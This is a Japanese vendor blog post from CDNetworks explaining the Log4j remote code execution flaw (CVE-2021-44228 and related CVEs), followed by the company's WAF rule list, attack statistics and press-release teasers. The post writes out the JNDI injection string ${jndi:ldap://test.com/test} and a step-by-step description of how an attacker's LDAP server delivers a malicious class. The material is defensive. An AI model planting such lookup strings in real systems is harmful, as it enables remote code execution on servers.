Apache Log4Jの脆弱性と、CDNeworks WAFサービスの有効性

Table of Contents

Try CDNetworks For Free

Most of our products have a 14 day free trail. No credit card needed.

Try Us For Free

Share This Post

21年12月9日、世界中で利用されているApacheパッケージに影響を与える重大なリモートコード実行(RCE)の脆弱性が発見されました。 Apache Log4Jとして知られるこのゼロデイソフトウェアの脆弱性は、世界中の何百万ものアプリケーションやデバイスに対する潜在的な脅威です。これに対して 2021年12月10日に米国国立標準技術研究所(NIST)が米国国家脆弱性情報データベースのLog4J脆弱性に対処する重要なCVE-2021-44228を公開しました。この脆弱性を利用した悪意のある攻撃の危機的状況にある事を示しています。 脆弱なJavaプロセスに対する脆弱性の深刻度は最高のCommon Vulnerability Scoring System(CVSS)と定められました。

Log4jとは?

Apache Log4jは、ほぼすべてのJavaサービスで使用されるJavaベースのロギングツールの1つです。 Apache Software Foundationが提供するオープンソースソフトウェアとして、ApacheLog4jはユーザーの操作とアプリケーションの動作を記録するために使用されます。 たとえば、サーバーにアクセスすると、Log4Jツールを介してサーバーに動作がログとして記録され、表示とエラーのチェックが行われます。

Log4jの脆弱性の影響はなぜ深刻なのか?

Log4j は広く利用されています。

Javaテクノロジ・スタックは、Windows、Linux、およびMac OSで広く使用されています。 IoT機器、家庭および商用のデバイス、 Webアプリケーション、バックエンド開発、ビッグデータ活用のためなどにも利用されています。 開発ツールとして、JavaはKafka、Elasticsearch、Flinkなどの様々なミドルウェアソリューションに利用されています。 さらに、何千ものグローバル企業がJavaサービス用にLog4jツールを導入しています。 また、Log4jは通常、名前が変更され、再パッケージ化され、ダウンロードされるため、この脆弱性はどこにでも存在する可能性があります。

この脆弱性は容易に悪用出来ます。

Log4Jの脆弱性は、アクセスログに${jndi:ldap://test.com/test}などの悪意のあるコードを挿入することで悪用される可能性があります。

 

脆弱性は何を引き起こすか?

2.15.0より前のバージョンのApache Log4jロギング フレームワークの脆弱性は、ログメッセージまたはログメッセージパラメータを制御できる認証されていないリモートでの攻撃者が、ロギングを実行しているシステムで悪意のあるコードを実行出来る可能性があります。 Log4j2ライブラリでメッセージルックアップ置換が有効になっている場合、攻撃者はログメッセージ内の特定の文字列をLDAPサーバーから送信された任意のコード文字列に置き換えることができます。 置換文字列を含むメッセージがログに記録されると、任意のコードが実行され、攻撃者がログを実行しているシステムを制御できる可能性があります。

Apache Log4jのデフォルト設定は、Java Naming and Directory Interface(JNDI)ルックアップをサポートしています。 これらのルックアップは、クラスファイルが安全でないサードパーティのLDAPサーバーからダウンロードされてオブジェクトを構築するときに悪用される可能性があります。

次の手順では、Log4Jの脆弱性がどのように伝播するかについて説明します。

  1. ハッカーは、Log4Jによってログに記録される$ {jndi:ldap://test.com/test}などのヘッダーにJNDIルックアップを挿入します。
  2. Log4Jは、ログ内の悪意のあるコードを処理してから、悪意のあるLDAPサーバー(//test.com/test)でクエリを実行します。
  3. 悪意のあるLDAPサーバーは、悪意のあるJavaクラスファイルをオリジンサーバーに送信することで応答します。

 

脆弱性は変化し続けます

脆弱性が発見されてから半月が経ちました。 それ以来、脆弱性が変化し続けると認識しており、その間3つの関連するCVEが特定されました。

CVE-2021-4104
Apache Log4j JMSAppenderは、攻撃者がLog4jへの編集権限を持っている場合、信頼できないデータのデシリアライズに対して脆弱です。

CVE-2021-44228
Apache Log4j JNDI機能を使用すると、システムは、攻撃者が制御するLDAPサーバーまたはその他のJNDI関連のエンドポイントと許可なく通信できます。

CVE-2021-45046
Apache Log4jスレッドコンテキストパターンとコンテキストルックアップパターンにより、悪意のあるJNDI入力データがDoS攻撃を引き起こす可能性があります。

 

CDNetworksは引き続きLog4jの脆弱性を注視します。

Log4Jの脆弱性が報告されるとすぐに、CDNetworksのセキュリティチームは、インフラストラクチャと製品を評価し、脆弱性の影響を軽減するために適切な更新を行うための対応を実施しました。

その結果、2021年12月10日から次の新しいWebアプリケーションファイアウォール(WAF)ルールをリリースして展開し、上記のCVEに対処し、Log4Jの悪用の可能性を軽減させました。 デフォルトでは、すべてのルールがブロックモードに設定されています。

ルールID 内容 デフォルト設定
9337 Log4J Body Block
9930 Apache-Log4j RCE Block
9959 log4j’s request bypass behavior Block
9960 Apache-Log4j RCE Block
9961 Apache-Log4j RCE Block
9962 Apache-Log4j RCE and version info Block

 

Log4j 攻撃コードのトレンド

2021年12月10日から12月26日まで、CDNetworksは2004902の悪意のあるLog4J脆弱性攻撃を正常にブロックしました。

CDNetworksセキュリティチームは、顧客がこれらの脆弱性から保護されていることを確認するために、状況を積極的に監視し続けています。 開発が必要な場合は、このブログにて新しい調査結果または情報を更新します。

More To Explore
プレスリリース

[プレスリリース]自社サイトへのHTTPS DDoS攻撃と緩和を観測: 攻撃概要と攻撃上位国

CDNetworksは、2022年11月8日、弊社Webサイトを標的とした220万リクエスト/秒(RPS)の大規模DDoS攻撃*と、弊社セキュリティプラットフォームによる緩和を確認いたしました。 90秒間で累計1億900万リクエストにおよぶDDoS攻撃を、弊社『Application Shield(アプリケーションシールド)』が防御しました。 * DDoS攻撃: Distributed Denial of Service Attackとは、分散型サービス妨害攻撃とも呼ばれるサイバー攻撃手法の一つです。複数マシンから大量のトラフィックを集中させることで、Webサービスとそれを支えるサーバやネットワークの正常稼働を妨害し、ユーザの利用を阻止しようとする悪質行為です。 CDNetworksが誇るクラウド型セキュリティソリューション『Application Shield(アプリケーションシールド)』は、マルチレイヤセキュリティでネットワークを万全に保護しています。今回の攻撃標的は弊社Webサイトでしたが、より安全なオンライン環境実現のため、このソリューションはWebサービスを提供する、また利用する全ての皆さまのお役に立つものです。 ■攻撃概要 * データ粒度: 5分単位 アプリケーション層への攻撃として最大規模でないにせよ、今回の攻撃がHTTPSを介したものであったことは注目に値します。HTTPS DDoS攻撃を仕掛けるには、安全なTLS暗号化接続確立の必要があり、それは攻撃者の多大なるコスト負担増を意味しています。それほどに、昨今のサイバー攻撃情勢は激化してきています。 2022年11月8日12時02分33秒(GTM+9)ごろ、170万RPSを超えるDDoS攻撃がCDNetworks Webサイトを標的として始まりました。この激しい攻撃は60秒間続き、最大で220万RPSに達しました。CDNetworksのセキュリティプラットフォームでは、今回の攻撃フィンガープリントと一致する3,400万RPSの大規模攻撃を過去にも確認していました。このため、標的となったCDNetworks Webサイトはボットネット*による今回の攻撃から自動的に・完全に保護され、更なる対策を講じる必要はありませんでした。 *ボットネットとは、サイバー攻撃者がトロイの木馬等を使用して乗っ取った、多数のユーザアカウントやコンピュータで構成されるネットワークのことです。ボットネットに組み込まれたアカウントやコンピュータは大抵は無自覚なまま、サイバー攻撃の際に踏み台として悪用されたり、加担させられたりします。 ■攻撃国別 トップ5 今回の2.2M

2022年12月7日
プレスリリース

CDNetworks、2022カタールW杯のストリーミング配信をアジア屈指OTT企業と展開

『FIFA World Cup Qatar 2022』で最高潮を迎えているスポーツストリーミング配信の一翼を、アジア屈指のOTT*プラットフォーム企業と共に、コンテンツデリバリネットワーク(CDN)の業界先駆者であるCDNetworksが担っています。 顧客であるOTTプラットフォーム企業および数百万人の視聴者の皆様に、この歴史的なイベントのライブストリーミングおよびビデオオンデマンドストリーミングサービスを本年もご提供できることは、私たちの喜びです。 * OTT: Over-the-Topとは、地上波放送・衛星放送・ケーブルTVといった通常配信手段を迂回し、インターネットを介して視聴者に直接提供されるメディアサービスの総称です。   ■CDNetworksによるストリーミングサービスの特長 1. ライブストリーミングに関するナレッジ CDNetworksには、ライブストリーミングに関する20年以上もの経験と技術力が集積されています。イングランドプレミアリーグ、アジアカップ、東南アジア競技大会といった国際的ゲームのストリーミングにおいても、プロフェッショナルなメディアデリバリソリューションを提供中です。 2. 大規模配信も安定の圧倒的リソース CDNetworksのコンテンツデリバリネットワークは、20万台以上のサーバ、2,800超のCDN PoP*で、世界70以上の国・地域をカバーしています。そうした潤沢なネットワークリソースが、グローバル数百万人規模の視聴者にも超低遅延かつ安定的な最高品質の配信体験をお届けし、OTTプラットフォーム企業の競争力を高めています。 *PoP: Point of Presenceとは、ネットワーク接続拠点を指しています。 3. 迅速なオンボーディングプロセス CDNetworksでは、多言語API、SDK、直感的で操作性の高いユーザコンソールをはじめとした様々なインテグレーションオプションをご用意しています。迅速かつシームレスなインテグレーションとデプロイにより、最小限の時間的・労力的・費用的コストでストリーミングを開始できます。

2022年11月30日
プレスリリース

[プレスリリース]2022年達成報告と2023年戦略概要を発表

コンテンツデリバリネットワーク(CDN)、エッジコンピューティング、クラウドセキュリティの業界先駆者であるCDNetworksは、重要市場であるアジア太平洋地域における更なるサービスパフォーマンス向上を目的として、リソース投資およびPoP(Point of Presence: ネットワーク接続拠点)拡張施策の継続・強化を決定しました。 特に日本、韓国、シンガポール、インドネシア、タイ、フィリピン、ベトナム、ミャンマーといった主要国顧客に対するサービス安定性、配信速度、セキュリティの一層の改善を目指す2022-2023年戦略の一環として、上記は不可欠のものです。 信頼性の高いCDN、DNS分析の第三者機関”PerfOps”による2022年報告で、CDNetworksは中国、インドネシア、タイ、ベトナムにおけるCDNパフォーマンスで主導的役割を果たし、日本、韓国、シンガポールでも市場競争力を高めていることが示されました。そうしたアジア太平洋地域での力強い成長とそれを支える技術力は、CDNetworksの高度に専門的でローカライズされたサービス提供の成功を裏打ちしています。 CDNetworksのアジア太平洋市場における原点は、2000年、韓国での設立時にさかのぼります。現在、20年以上にわたるビジネス展開とイノベーションによって、CDNetworksはシンガポールに本社を置く、CDNおよびエッジコンピューティング業界のグローバルリーダーの一社となりました。そして今なお、顧客企業およびパートナー企業に高い評価を受けながら躍進を続けています。 親会社であるWangsu社(Wangsu Science&Technology Co., Ltd. / 網宿科技股分有限公司、深圳証券取引所SHE: 300017)の支援の下で、CDNetworksは世界2,800以上のPoPを保有し、アジア太平洋地域16カ国以上をカバーするまでに成長を遂げました。また、中国本土70以上の都市にPoPを配置し、中国市場でのビジネス拡大を望む企業向けにICP備案(ICP登録申請支援)サービスも提供しています。 CDNetworksは、アジア太平洋市場への投資を効率化するため多方面からのアプローチを行っています。2022年に達成された主な取り組みは以下の通りです: ・製品 2022年、CDNetworksは『Enterprise Secure Access(エンタープライズセキュアアクセス: ゼロトラスト設計SASEモデルサービス)』、超低遅延ストリーミング、WAAPソリューションなど、急速に進化するデジタル時代に対応できるよう設計された、一連の最新型製品を提供開始しました。 ・オペレーション 2022年、CDNetworksは全地域で担当営業およびサービスチームの人員・品質強化を行いました。お客様へのタイムリーかつシームレスなサポート体制構築はCDNetworksの最優先事項の一つであり、常により迅速で専門的なサービスオペレーションの提供を目指しています。 ・顧客エンゲージメント 2022年、CDNetworksは『BroadcastAsia Singapore』、『Cybersec Taiwan』、『ICTCOM Vietnam』、『Cyber Security

2022年11月2日

© 2025 CDNetworks Japan Co.,Ltd. All rights reserved.

Facebook Twitter Linkedin Youtube

03-5843-5487   |   support@cdnetworks.com